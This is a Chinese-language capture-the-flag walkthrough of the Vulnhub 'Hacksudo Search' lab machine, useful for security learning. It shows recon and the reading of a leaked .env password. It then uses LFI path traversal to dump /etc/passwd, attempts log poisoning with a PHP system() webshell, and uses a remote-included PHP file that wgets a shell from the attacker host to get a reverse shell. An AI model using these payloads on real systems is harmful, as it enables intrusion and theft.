Vulnhub之Hacksudo Search靶机解题过程
Hacksudo Search
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.196.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:96:d2:34 1 60 PCS Systemtechnik GmbH
192.168.56.212 08:00:27:2a:e6:36 1 60 PCS Systemtechnik GmbH liy
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.212
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.212 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 02:28 EST
Nmap scan report for localhost (192.168.56.212)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
| 256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_ 256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2A:E6:36 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.212/robots.txt
/* find me * im number 1 search engine .
just joking :)
www.hacksudo.com
robots.txt文件没有太大有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.212
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/23 02:32:20 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.212/assets/]
/account (Status: 301) [Size: 318] [--> http://192.168.56.212/account/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.212/javascript/]
/LICENSE (Status: 200) [Size: 1074]
/server-status (Status: 403) [Size: 279]
Progress: 218394 / 220561 (99.02%)===============================================================
2022/11/23 02:32:45 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ gobuster dir -u http://192.168.56.212 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.212
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,php
[+] Timeout: 10s
===============================================================
2022/11/23 02:32:56 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.212/images/]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 715]
/.php (Status: 403) [Size: 279]
/search.php (Status: 200) [Size: 165]
/submit.php (Status: 200) [Size: 165]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.212/assets/]
/account (Status: 301) [Size: 318] [--> http://192.168.56.212/account/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.212/javascript/]
/robots.txt (Status: 200) [Size: 75]
/LICENSE (Status: 200) [Size: 1074]
/search1.php (Status: 200) [Size: 2918]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/crawler.php (Status: 500) [Size: 0]
Progress: 1099496 / 1102805 (99.70%)===============================================================
2022/11/23 02:34:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ nikto -h http://192.168.56.212
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.212
+ Target Hostname: 192.168.56.212
+ Target Port: 80
+ Start Time: 2022-11-23 02:35:42 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2022-11-23 02:36:37 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
Nikto工具发现了/.env文件
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.212/.env
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!
返回结果中包含了数据库用户名和密码,测试以下这个是不是同时也是SSH用户名密码:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ ssh hiraman@192.168.56.212
The authenticity of host '192.168.56.212 (192.168.56.212)' can't be established.
ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.212' (ED25519) to the list of known hosts.
hiraman@192.168.56.212's password:
Permission denied, please try again.
hiraman@192.168.56.212's password:
看来这只是数据库的用户名和密码。
分析/search.php,里面有个按钮,是链接到google,带上参数q和client
<a href="https://www.google.com/search?q=hacksudo&client=">
访问search1.php的contact链接时,提示要FUZZ?
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ wfuzz -c -u http://192.168.56.212/search1.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.212/search1.php?FUZZ=../../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001129: 200 143 L 260 W 3797 Ch "me"
000011286: 200 137 L 288 W 2918 Ch "subscribe1"
找到了参数me,尝试一下:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ curl http://192.168.56.212/search1.php?me=../../../../../../../etc/passwd
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title>
Hacksudo::search
</title>
</head>
<body style="background-color:Navy;">
<!-- find me @hacksudo.com/contact @fuzzing always best option :) -->
<font color=white>
<div class="topnav">
<a class="active" href="?find=home.php">Home</a>
<a href="?Me=about.php">About</a>
<a href="?FUZZ=contact.php">Contact</a>
<div class="search-container">
<form action="submit.php">
<input type="text" placeholder="Search.." name="search">
<button type="submit"><i class="fa fa-search"></i></button>
</form>
</div>
</div>
<div style="padding-left:16px">
<h1><font color=red>HackSudo</font> Search box</h1>
<p>JumpStation The web crawler with Google</p>
</div>
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
</form>
</font>
<font color=red><h2><marquee> <a href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a>
</font>
</dch>
</body>
</html>
尝试 一下有无私钥文件可以读取:(写在后面:需要仔细看一下有哪些用户名,在做题过程中忽略了Hacksudo用户,否则很快就拿到了shell)
http://192.168.56.212/search1.php?me=/home/search/.ssh/id_rsa
尝试无果,接下来用hydra破解一下密码,破解了很长时间,密码依然没有出来。
不过既然可以利用LFI本地文件包含漏洞,看是否可以通过auth_log文件获得shell
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ ssh '<? php system($_GET["cmd"]);?>'@192.168.56.212
<? php system($_GET["cmd"]);?>@192.168.56.212's password:
Permission denied, please try again.
<? php system($_GET["cmd"]);?>@192.168.56.212's password:
Permission denied, please try again.
<? php system($_GET["cmd"]);?>@192.168.56.212's password:
<? php system($_GET["cmd"]);?>@192.168.56.212: Permission denied (publickey,password).
这个方法没奏效。
/search1.php需要去看一下除了LFI意外,是否存在RFI
在Kali Linux本地启用web,创建一个临时文件:
─(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ echo 'jason, hi, ' > test.txt
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
看一下是否存在RFI,
访问:
192.168.56.212/search1.php?me=http://192.168.56.206:8000/test.txt
发现可以成功读取test.txt内容,因此证明除了LFI以外,还存在RFI
编写一个Php脚本,利用RFI漏洞访问该脚本,从而下载shell.php脚本
访问:
http://192.168.56.212/search1.php?me=http://192.168.56.206:8000/cmdshell.php
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ cat cmdshell.php
<?php
system('wget http://192.168.56.206:8000/shell.php');
?>
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.212 - - [23/Nov/2022 03:34:23] "GET /test.txt HTTP/1.0" 200 -
192.168.56.212 - - [23/Nov/2022 03:41:08] "GET /cmdshell.php HTTP/1.0" 200 -
192.168.56.212 - - [23/Nov/2022 03:41:08] "GET /shell.php HTTP/1.1" 200 -
192.168.56.212 - - [23/Nov/2022 03:41:37] "GET /cmdshell.php HTTP/1.0" 200 -
192.168.56.212 - - [23/Nov/2022 03:41:37] "GET /shell.php HTTP/1.1" 200 -
发现成功下载了shell.php,浏览器访问shell.php
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.212] 52122
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
03:42:38 up 1:18, 0 users, load average: 0.00, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$
在Kali Linux成功得到了shell.
数据库的密码可以用于hacksudo用户
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_Search]
└─$ ssh hacksudo@192.168.56.212
hacksudo@192.168.56.212's password:
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 15 14:10:28 2021 from 192.168.43.217
hacksudo@HacksudoSearch:~$
提权
STRIVE FOR PROGRESS,NOT FOR PERFECTION
